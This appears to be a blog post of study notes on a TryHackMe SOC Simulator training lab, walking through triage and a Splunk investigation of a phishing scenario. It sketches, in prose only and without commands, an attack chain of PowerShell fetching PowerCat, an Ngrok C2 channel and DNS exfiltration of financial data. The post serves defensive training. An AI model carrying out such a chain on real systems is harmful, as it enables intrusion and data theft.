This post introduces the TryHackMe SOC (Security Operations Center) Simulator, focusing on its real-world attack simulation capabilities. The tutorial walks through handling alerts, investigating cyberattacks, analyzing events, and writing case reports. This session specifically covers the “Phishing Unfolding” challenge, with promises of more challenges in later videos.

Certified Security Blue Team Level 1 Study Notes

HackTheBox CDSA Study Notes

SOC Simulator

Documentation and Tools:

  • Scenario Overview: Detailed explanation of scenarios.
  • Tool Documentation: Overview of tools like Splunk and Analyst VM.
  • Step-by-Step Guidance: Recommendations for analyzing incidents.
  • SOC Components:
    • SIEM (Splunk): Centralized log management and alert correlation.
    • Analyst Workstation: Handling email alerts and system access.

Dashboard Overview:

  • Provides metrics like the total, closed, and open alerts categorized by severity.
  • Visualization of alert types and priorities.

Alert Investigation Workflow:

  • Filter Alerts: Prioritize by severity (critical, high, medium, low).
  • Analysis Steps: Start with critical alerts, review descriptions, and correlate parent-child process relationships.

SOC Incident Investigation Case Study

Example Incident Investigation:

  1. Alert Details:
    • Suspicious Parent-Child Relationship:
      • Parent Process: PowerShell.
      • Child Process: NSLookup performing DNS queries.
    • The DNS queries targeted encoded subdomains, triggering suspicion.
  2. Analysis in Splunk:
    • Investigated process IDs and correlated events.
    • Identified a pattern of activity involving PowerShell.
  3. Uncovered Malicious Activity:
    • PowerShell was used to download PowerCat, a known tool for privilege escalation and data exfiltration.
    • Established a Command and Control (C2) server via Ngrok.
    • System enumeration and mapping of financial record shares.
    • Data exfiltration via DNS queries.
  4. Case Report:
    • Documented findings:
      • Use of malicious tools.
      • Detailed attack sequence.
      • Recommendations for detection improvements and domain investigations.

    Creating SOC Case Report

    Report Submission:

    • The incident was classified as a “True Positive.”
    • A case report was drafted and submitted through the SOC Simulator.

    Simulator Exploration:

    • Users can revisit closed alerts and edit reports.
    • Upcoming features like playbooks are hinted at for future updates.

    Video Walkthrough

    ,
    Show Comments

    MasterMind Study Notes

    About the Author

    Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

    View Articles